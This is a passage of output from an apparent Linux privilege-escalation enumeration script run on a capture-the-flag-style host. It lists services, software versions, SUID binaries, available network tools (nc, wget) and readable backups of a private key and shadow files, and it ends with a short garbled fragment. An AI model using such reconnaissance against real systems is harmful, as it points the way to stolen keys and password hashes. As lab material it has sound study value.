systemd-rfkill.socket -rw-r--r-- 1 root root 490 Jan 28 2018 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 635 Jan 28 2018 systemd-udevd-control.socket -rw-r--r-- 1 root root 610 Jan 28 2018 systemd-udevd-kernel.socket -rw-r--r-- 1 root root 445 Jan 28 2018 
system.slice -rw-r--r-- 1 root root 592 Jan 28 2018 system-update.target -rw-r--r-- 1 root root 445 Jan 28 2018 timers.target -rw-r--r-- 1 root root 435 Jan 28 2018 time-sync.target -rw-r--r-- 1 root root 457 Jan 28 2018 umount.target -rw-r--r-- 1 root root 432 Jan 28 2018 user.slice -rw-r--r-- 1 root root 493 Jan 25 2018 ssh.service -rw-r--r-- 1 root root 244 Jan 25 2018 ssh@.service lrwxrwxrwx 1 root root 9 Jan 18 2018 sudo.service -> /dev/null -rw-r--r-- 1 root root 155 Jan 17 2018 phpsessionclean.service -rw-r--r-- 1 root root 144 Jan 17 2018 phpsessionclean.timer -rw-r--r-- 1 root root 216 Jan 16 2018 ssh.socket -rw-r--r-- 1 root root 741 Dec 18 2017 accounts-daemon.service -rw-r--r-- 1 root root 251 Nov 16 2017 cron.service -rw-r--r-- 1 root root 266 Aug 15 2017 ufw.service -rw-r--r-- 1 root root 626 Nov 28 2016 ifup@.service -rw-r--r-- 1 root root 735 Nov 25 2016 networking.service -rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service /lib/systemd/system/apache2.service.d: total 4.0K -rw-r--r-- 1 root root 42 Jul 16 2019 apache2-systemd.conf /lib/systemd/system/halt.target.wants: total 0 lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-halt.service -> ../plymouth-halt.service /lib/systemd/system/initrd-switch-root.target.wants: total 0 lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-start.service -> ../plymouth-start.service lrwxrwxrwx 1 root root 31 Apr 4 2019 plymouth-switch-root.service -> ../plymouth-switch-root.service /lib/systemd/system/kexec.target.wants: total 0 lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-kexec.service -> ../plymouth-kexec.service /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 15 Jul 22 2019 getty.target -> ../getty.target lrwxrwxrwx 1 root root 33 Jul 22 2019 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path lrwxrwxrwx 1 root root 25 Jul 22 2019 systemd-logind.service -> ../systemd-logind.service lrwxrwxrwx 1 root root 39 Jul 22 2019 systemd-update-utmp-runlevel.service -> 
../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 root root 32 Jul 22 2019 systemd-user-sessions.service -> ../systemd-user-sessions.service lrwxrwxrwx 1 root root 15 Jun 10 2019 dbus.service -> ../dbus.service lrwxrwxrwx 1 root root 24 Apr 4 2019 plymouth-quit.service -> ../plymouth-quit.service lrwxrwxrwx 1 root root 29 Apr 4 2019 plymouth-quit-wait.service -> ../plymouth-quit-wait.service /lib/systemd/system/poweroff.target.wants: total 0 lrwxrwxrwx 1 root root 28 Apr 4 2019 plymouth-poweroff.service -> ../plymouth-poweroff.service /lib/systemd/system/reboot.target.wants: total 0 lrwxrwxrwx 1 root root 26 Apr 4 2019 plymouth-reboot.service -> ../plymouth-reboot.service /lib/systemd/system/sysinit.target.wants: total 0 lrwxrwxrwx 1 root root 20 Jul 22 2019 cryptsetup.target -> ../cryptsetup.target lrwxrwxrwx 1 root root 22 Jul 22 2019 dev-hugepages.mount -> ../dev-hugepages.mount lrwxrwxrwx 1 root root 19 Jul 22 2019 dev-mqueue.mount -> ../dev-mqueue.mount lrwxrwxrwx 1 root root 28 Jul 22 2019 kmod-static-nodes.service -> ../kmod-static-nodes.service lrwxrwxrwx 1 root root 36 Jul 22 2019 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount lrwxrwxrwx 1 root root 32 Jul 22 2019 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount lrwxrwxrwx 1 root root 26 Jul 22 2019 sys-kernel-config.mount -> ../sys-kernel-config.mount lrwxrwxrwx 1 root root 25 Jul 22 2019 sys-kernel-debug.mount -> ../sys-kernel-debug.mount lrwxrwxrwx 1 root root 36 Jul 22 2019 systemd-ask-password-console.path -> ../systemd-ask-password-console.path lrwxrwxrwx 1 root root 25 Jul 22 2019 systemd-binfmt.service -> ../systemd-binfmt.service lrwxrwxrwx 1 root root 30 Jul 22 2019 systemd-hwdb-update.service -> ../systemd-hwdb-update.service lrwxrwxrwx 1 root root 27 Jul 22 2019 systemd-journald.service -> ../systemd-journald.service lrwxrwxrwx 1 root root 32 Jul 22 2019 systemd-journal-flush.service -> ../systemd-journal-flush.service lrwxrwxrwx 1 root root 36 Jul 
22 2019 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service lrwxrwxrwx 1 root root 31 Jul 22 2019 systemd-modules-load.service -> ../systemd-modules-load.service lrwxrwxrwx 1 root root 30 Jul 22 2019 systemd-random-seed.service -> ../systemd-random-seed.service lrwxrwxrwx 1 root root 25 Jul 22 2019 systemd-sysctl.service -> ../systemd-sysctl.service lrwxrwxrwx 1 root root 37 Jul 22 2019 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service lrwxrwxrwx 1 root root 33 Jul 22 2019 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service lrwxrwxrwx 1 root root 24 Jul 22 2019 systemd-udevd.service -> ../systemd-udevd.service lrwxrwxrwx 1 root root 31 Jul 22 2019 systemd-udev-trigger.service -> ../systemd-udev-trigger.service lrwxrwxrwx 1 root root 30 Jul 22 2019 systemd-update-utmp.service -> ../systemd-update-utmp.service lrwxrwxrwx 1 root root 30 Apr 4 2019 plymouth-read-write.service -> ../plymouth-read-write.service lrwxrwxrwx 1 root root 25 Apr 4 2019 plymouth-start.service -> ../plymouth-start.service /lib/systemd/system/getty.target.wants: total 0 lrwxrwxrwx 1 root root 23 Jul 22 2019 getty-static.service -> ../getty-static.service /lib/systemd/system/graphical.target.wants: total 0 lrwxrwxrwx 1 root root 39 Jul 22 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/local-fs.target.wants: total 0 lrwxrwxrwx 1 root root 29 Jul 22 2019 systemd-remount-fs.service -> ../systemd-remount-fs.service /lib/systemd/system/rescue.target.wants: total 0 lrwxrwxrwx 1 root root 39 Jul 22 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 25 Jul 22 2019 systemd-initctl.socket -> ../systemd-initctl.socket lrwxrwxrwx 1 root root 32 Jul 22 2019 systemd-journald-audit.socket -> ../systemd-journald-audit.socket lrwxrwxrwx 1 root root 34 Jul 22 2019 
systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket lrwxrwxrwx 1 root root 26 Jul 22 2019 systemd-journald.socket -> ../systemd-journald.socket lrwxrwxrwx 1 root root 31 Jul 22 2019 systemd-udevd-control.socket -> ../systemd-udevd-control.socket lrwxrwxrwx 1 root root 30 Jul 22 2019 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket lrwxrwxrwx 1 root root 14 Jun 10 2019 dbus.socket -> ../dbus.socket /lib/systemd/system/timers.target.wants: total 0 lrwxrwxrwx 1 root root 31 Jul 22 2019 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer /lib/systemd/system/rc-local.service.d: total 4.0K -rw-r--r-- 1 root root 290 Jul 22 2019 debian.conf /lib/systemd/system/user@.service.d: total 4.0K -rw-r--r-- 1 root root 125 Jul 22 2019 timeout.conf /lib/systemd/system/runlevel1.target.wants: total 0 /lib/systemd/system/runlevel2.target.wants: total 0 /lib/systemd/system/runlevel3.target.wants: total 0 /lib/systemd/system/runlevel4.target.wants: total 0 /lib/systemd/system/runlevel5.target.wants: total 0 /lib/systemd/system-generators: total 200K -rwxr-xr-x 1 root root 23K Jul 22 2019 systemd-cryptsetup-generator -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-debug-generator -rwxr-xr-x 1 root root 31K Jul 22 2019 systemd-fstab-generator -rwxr-xr-x 1 root root 14K Jul 22 2019 systemd-getty-generator -rwxr-xr-x 1 root root 26K Jul 22 2019 systemd-gpt-auto-generator -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-hibernate-resume-generator -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-rc-local-generator -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-system-update-generator -rwxr-xr-x 1 root root 31K Jul 22 2019 systemd-sysv-generator -rwxr-xr-x 1 root root 14K Jul 22 2019 systemd-veritysetup-generator -rwxr-xr-x 1 root root 286 Jun 21 2019 friendly-recovery /lib/systemd/system-sleep: total 4.0K -rwxr-xr-x 1 root root 92 Feb 22 2018 hdparm /lib/systemd/network: total 16K -rw-r--r-- 1 root root 645 Jan 28 2018 80-container-host0.network 
-rw-r--r-- 1 root root 718 Jan 28 2018 80-container-ve.network -rw-r--r-- 1 root root 704 Jan 28 2018 80-container-vz.network -rw-r--r-- 1 root root 412 Jan 28 2018 99-default.link /lib/systemd/system-preset: total 4.0K -rw-r--r-- 1 root root 951 Jan 28 2018 90-systemd.preset /lib/systemd/system-shutdown: total 0 ### SOFTWARE ############################################# [-] Sudo version: Sudo version 1.8.21p2 [-] Apache version: Server version: Apache/2.4.29 (Ubuntu) Server built: 2019-07-16T18:14:45 [-] Apache user configuration: APACHE_RUN_USER=www-data APACHE_RUN_GROUP=www-data [-] Installed Apache modules: Loaded Modules: core_module (static) so_module (static) watchdog_module (static) http_module (static) log_config_module (static) logio_module (static) version_module (static) unixd_module (static) access_compat_module (shared) actions_module (shared) alias_module (shared) auth_basic_module (shared) authn_core_module (shared) authn_file_module (shared) authz_core_module (shared) authz_host_module (shared) authz_user_module (shared) autoindex_module (shared) deflate_module (shared) dir_module (shared) env_module (shared) filter_module (shared) mime_module (shared) mpm_prefork_module (shared) negotiation_module (shared) php7_module (shared) reqtimeout_module (shared) rewrite_module (shared) setenvif_module (shared) status_module (shared) [-] www home dir contents: /var/www/: total 20K drwxr-xr-x 3 root root 4.0K Aug 25 2019 . drwxr-xr-x 13 root root 4.0K Aug 25 2019 .. drwxr-xr-x 7 root root 4.0K Aug 26 2019 html -rw-r--r-- 1 root root 22 Aug 25 2019 nikto-test-pFTYNhZX.html -rw-rw-r-- 1 Matt Matt 482 Aug 25 2019 SimpleHTTPPutServer.py /var/www/html: total 56K drwxr-xr-x 7 root root 4.0K Aug 26 2019 . drwxr-xr-x 3 root root 4.0K Aug 25 2019 .. 
drwxr-xr-x 2 root root 4.0K Aug 25 2019 css drwxr-xr-x 2 root root 4.0K Apr 23 2019 fonts drwxr-xr-x 3 root root 4.0K Apr 23 2019 images -rw-r--r-- 1 root root 3.8K Aug 25 2019 index.html drwxr-xr-x 2 root root 4.0K Apr 23 2019 js -rw-r--r-- 1 root root 24K Aug 25 2019 style.css drwxr-xr-x 2 root root 4.0K Aug 26 2019 upload /var/www/html/css: total 608K drwxr-xr-x 2 root root 4.0K Aug 25 2019 . drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. -rw-r--r-- 1 root root 25K Mar 8 2018 all.css -rw-r--r-- 1 root root 24K Jul 17 2017 animate.css -rw-r--r-- 1 root root 53K Aug 2 2016 animate.min.css -rw-r--r-- 1 root root 188K Aug 13 2017 bootstrap.css -rw-r--r-- 1 root root 25K Jan 6 2017 bootstrap-grid.css -rw-r--r-- 1 root root 19K Jan 6 2017 bootstrap-grid.min.css -rw-r--r-- 1 root root 148K Jan 6 2017 bootstrap.min.css -rw-r--r-- 1 root root 5.8K Jan 6 2017 bootstrap-reboot.css -rw-r--r-- 1 root root 4.6K Jan 6 2017 bootstrap-reboot.min.css -rw-r--r-- 1 root root 3.8K Oct 29 2017 carousel.css -rw-r--r-- 1 root root 4.5K Mar 8 2018 colors.css -rw-r--r-- 1 root root 37K May 23 2017 font-awesome.css -rw-r--r-- 1 root root 31K May 23 2017 font-awesome.min.css -rw-r--r-- 1 root root 3.7K Oct 20 2017 lightbox.css -rw-r--r-- 1 root root 3.7K Mar 8 2018 responsive.css /var/www/html/fonts: total 1.2M drwxr-xr-x 2 root root 4.0K Apr 23 2019 . drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. 
-rw-r--r-- 1 root root 1.5K Nov 6 2017 flaticon.css -rw-r--r-- 1 root root 7.9K Nov 6 2017 Flaticon.eot -rw-r--r-- 1 root root 49K Nov 6 2017 Flaticon.svg -rw-r--r-- 1 root root 7.7K Nov 6 2017 Flaticon.ttf -rw-r--r-- 1 root root 5.3K Nov 6 2017 Flaticon.woff -rw-r--r-- 1 root root 132K May 23 2017 FontAwesome.otf -rw-r--r-- 1 root root 162K May 23 2017 fontawesome-webfont.eot -rw-r--r-- 1 root root 434K May 23 2017 fontawesome-webfont.svg -rw-r--r-- 1 root root 162K May 23 2017 fontawesome-webfont.ttf -rw-r--r-- 1 root root 96K May 23 2017 fontawesome-webfont.woff -rw-r--r-- 1 root root 76K May 23 2017 fontawesome-webfont.woff2 /var/www/html/images: total 60K drwxr-xr-x 3 root root 4.0K Apr 23 2019 . drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. -rw-r--r-- 1 root root 1.7K Oct 19 2017 apple-touch-icon.png -rw-r--r-- 1 root root 34K Oct 19 2017 favicon.ico -rw-r--r-- 1 root root 1.5K Oct 15 2017 flogo.png drwxr-xr-x 2 root root 4.0K Apr 23 2019 icons -rw-r--r-- 1 root root 2.2K Oct 22 2017 logo.png /var/www/html/images/icons: total 20K drwxr-xr-x 2 root root 4.0K Apr 23 2019 . drwxr-xr-x 3 root root 4.0K Apr 23 2019 .. -rw-r--r-- 1 root root 3.7K Oct 15 2017 icon_01.png -rw-r--r-- 1 root root 3.1K Oct 15 2017 icon_02.png -rw-r--r-- 1 root root 3.8K Oct 15 2017 icon_03.png /var/www/html/js: total 556K drwxr-xr-x 2 root root 4.0K Apr 23 2019 . drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. -rw-r--r-- 1 root root 59K Mar 8 2018 all.js -rw-r--r-- 1 root root 8.9K Jul 17 2017 animate.js -rw-r--r-- 1 root root 121K Aug 14 2017 bootstrap.js -rw-r--r-- 1 root root 69K Aug 14 2017 bootstrap.min.js -rw-r--r-- 1 root root 84K Oct 29 2017 carousel.js -rw-r--r-- 1 root root 2.3K Mar 8 2018 custom.js -rw-r--r-- 1 root root 95K Jun 27 2017 jquery.min.js -rw-r--r-- 1 root root 18K Oct 20 2017 lightbox.js -rw-r--r-- 1 root root 51K Oct 19 2017 parallax.js -rw-r--r-- 1 root root 23K Jun 30 2017 tether.min.js /var/www/html/upload: total 1.1M drwxr-xr-x 2 root root 4.0K Aug 26 2019 . 
drwxr-xr-x 7 root root 4.0K Aug 26 2019 .. -rw-r--r-- 1 root root 577K Apr 20 2018 Cyber-security-web-banner.jpg -rw-r--r-- 1 root root 44K Mar 8 2018 demo-bg.jpg -rw-r--r-- 1 root root 4.2K Mar 8 2018 device_02.png -rw-r--r-- 1 root root 33K Mar 8 2018 hero_01.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_01.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_02.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_03.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_04.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_05.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_06.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_07.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_08.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_09.jpg -rw-r--r-- 1 root root 5.3K Mar 8 2018 insta_10.jpg -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_01.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_02.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_03.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_04.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_05.png -rw-r--r-- 1 root root 1.4K Mar 8 2018 logo_06.png -rw-r--r-- 1 root root 9.6K Mar 8 2018 menu-banner_01.jpg -rw-r--r-- 1 root root 11K Mar 8 2018 menu-banner.jpg -rw-r--r-- 1 root root 43K Mar 8 2018 parallax_01.jpg -rw-r--r-- 1 root root 37K Mar 8 2018 parallax_02.jpg -rw-r--r-- 1 root root 20K Mar 8 2018 screen_01.jpg -rw-r--r-- 1 root root 20K Mar 8 2018 screen_02.jpg -rw-r--r-- 1 root root 20K Mar 8 2018 screen_03.jpg -rw-r--r-- 1 root root 15K Mar 8 2018 service_01.jpg -rw-r--r-- 1 root root 15K Mar 8 2018 service_02.jpg -rw-r--r-- 1 root root 15K Mar 8 2018 service_03.jpg -rw-r--r-- 1 root root 9.6K Mar 8 2018 team_01.jpg -rw-r--r-- 1 root root 9.6K Mar 8 2018 team_02.jpg -rw-r--r-- 1 root root 9.6K Mar 8 2018 team_03.jpg -rw-r--r-- 1 root root 16K Mar 8 2018 work_01.jpg -rw-r--r-- 1 root root 16K Mar 8 2018 work_02.jpg -rw-r--r-- 1 root root 16K Mar 8 2018 work_03.jpg ### INTERESTING FILES #################################### [-] Useful 
file locations: /bin/nc /bin/netcat /usr/bin/wget /usr/bin/gcc [-] Installed compilers: ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler ii g++-7 7.4.0-1ubuntu1~18.04.1 amd64 GNU C++ compiler ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler ii gcc-7 7.4.0-1ubuntu1~18.04.1 amd64 GNU C compiler [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1382 Aug 25 2019 /etc/passwd -rw-r--r-- 1 root root 709 Oct 25 2019 /etc/group -rw-r--r-- 1 root root 581 Apr 9 2018 /etc/profile -rw-r----- 1 root shadow 935 Aug 26 2019 /etc/shadow [-] SUID files: -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount -rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping -rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount [-] SGID files: -rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry -rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab -rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent -rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate -rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write -rwxr-sr-x 1 root tty 30800 Oct 15 2018 /usr/bin/wall -rwxr-sr-x 1 root shadow 71816 Mar 22 
2019 /usr/bin/chage [+] Files with POSIX capabilities set: /usr/bin/mtr-packet = cap_net_raw+ep [-] NFS displaying partitions and filesystems - you need to check if exotic filesystems # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> <dump> <pass> # / was on /dev/sda1 during installation UUID=9687c60d-cb06-4f55-9bdc-08678a8f805c / ext4 errors=remount-ro 0 1 /swapfile none swap sw 0 0 [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 2683 Jan 17 2018 /etc/sysctl.conf -rw-r--r-- 1 root root 703 Aug 21 2017 /etc/logrotate.conf -rw-r--r-- 1 root root 1260 Feb 26 2018 /etc/ucf.conf -rw-r--r-- 1 root root 191 Feb 7 2018 /etc/libaudit.conf -rw-r--r-- 1 root root 2969 Feb 28 2018 /etc/debconf.conf -rw-r--r-- 1 root root 552 Apr 4 2018 /etc/pam.conf -rw-r--r-- 1 root root 144 Aug 24 2019 /etc/kernel-img.conf -rw-r--r-- 1 root root 4861 Feb 22 2018 /etc/hdparm.conf -rw-r--r-- 1 root root 92 Apr 9 2018 /etc/host.conf -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf -rw-r--r-- 1 root root 1358 Jan 30 2018 /etc/rsyslog.conf -rw-r--r-- 1 root root 403 Mar 1 2018 /etc/updatedb.conf -rw-r--r-- 1 root root 350 Aug 24 2019 /etc/popularity-contest.conf -rw-r--r-- 1 root root 5898 Aug 24 2019 /etc/ca-certificates.conf -rw-r--r-- 1 root root 2584 Feb 1 2018 /etc/gai.conf -rw-r--r-- 1 root root 513 Aug 24 2019 /etc/nsswitch.conf -rw-r--r-- 1 root root 14867 Oct 13 2016 /etc/ltrace.conf -rw-r--r-- 1 root root 3028 Aug 24 2019 /etc/adduser.conf -rw-r--r-- 1 root root 604 Aug 13 2017 /etc/deluser.conf 
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf -rw-r--r-- 1 root root 812 Mar 24 2018 /etc/mke2fs.conf [-] Current user's history files: -rw------- 1 redis redis 399 Oct 25 2019 /var/lib/redis/.bash_history [-] Location and contents (if accessible) of .bash_history file(s): /home/Matt/.bash_history [-] Location and Permissions (if accessible) of .bak file(s): -rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak -rw------- 1 root root 695 Aug 25 2019 /var/backups/group.bak -rw------- 1 root shadow 577 Aug 25 2019 /var/backups/gshadow.bak -rw------- 1 root shadow 935 Aug 26 2019 /var/backups/shadow.bak -rw------- 1 root root 1382 Aug 25 2019 /var/backups/passwd.bak [-] Any interesting mail in /var/mail: total 8 drwxrwsr-x 2 root mail 4096 Aug 24 2019 . drwxr-xr-x 13 root root 4096 Aug 25 2019 .. ### SCAN COMPLETE ####################################custom-colorsXAIZ|xA.!zn